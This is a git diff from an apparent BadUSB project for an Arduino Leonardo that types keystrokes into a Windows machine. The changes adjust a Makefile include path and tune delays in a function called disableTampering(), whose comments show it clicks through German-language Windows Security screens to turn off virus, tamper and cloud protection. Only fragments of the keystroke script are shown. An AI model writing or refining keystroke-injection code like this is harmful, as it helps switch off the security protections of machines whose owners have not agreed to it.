diff --git a/Makefile b/Makefile index 44c8518..8f80d23 100644 --- a/Makefile +++ b/Makefile @@ -1,8 +1,10 @@ +ARCHITECTURE=avr BOARD_TAG = leonardo USER_LIB_PATH = ./libraries ARDUINO_LIBS = HID Keyboard AVRDUDE_CONF = /etc/avrdude.conf -include /usr/local/share/arduino-makefile/Arduino.mk +# include /usr/local/share/arduino-makefile/Arduino.mk +include /usr/share/arduino/makefile/Arduino.mk diff --git a/badusb.ino b/badusb-stick.ino similarity index 99% rename from badusb.ino rename to badusb-stick.ino index 6979912..82c0205 100644 --- a/badusb.ino +++ b/badusb-stick.ino @@ -49,7 +49,7 @@ void disableTampering() { Keyboard.release('x'); delay(400); - // Viren- und Bedrohungsschutz + // Viren- und Bedrohungsschutz (just hit ENTER) Keyboard.press(KEY_RETURN); delay(KEY_DELAY); Keyboard.release(KEY_RETURN); @@ -86,14 +86,14 @@ void disableTampering() { Keyboard.press(' '); delay(KEY_DELAY); Keyboard.release(' '); - delay(KEY_DELAY); + delay(1400); // yes do it with ALT+j Keyboard.press(KEY_LEFT_ALT); Keyboard.press('j'); delay(KEY_DELAY); Keyboard.releaseAll(); - delay(1200); + delay(1400); // move down to Cloudbasierter Schutz slider diff --git a/badusb.ino.disableTamperWorks b/badusb-stick.ino.disableTamperWorks similarity index 100% rename from badusb.ino.disableTamperWorks rename to badusb-stick.ino.disableTamperWorks diff --git a/badusb.ino.works b/badusb-stick.ino.works similarity index 100% rename from badusb.ino.works rename to badusb-stick.ino.works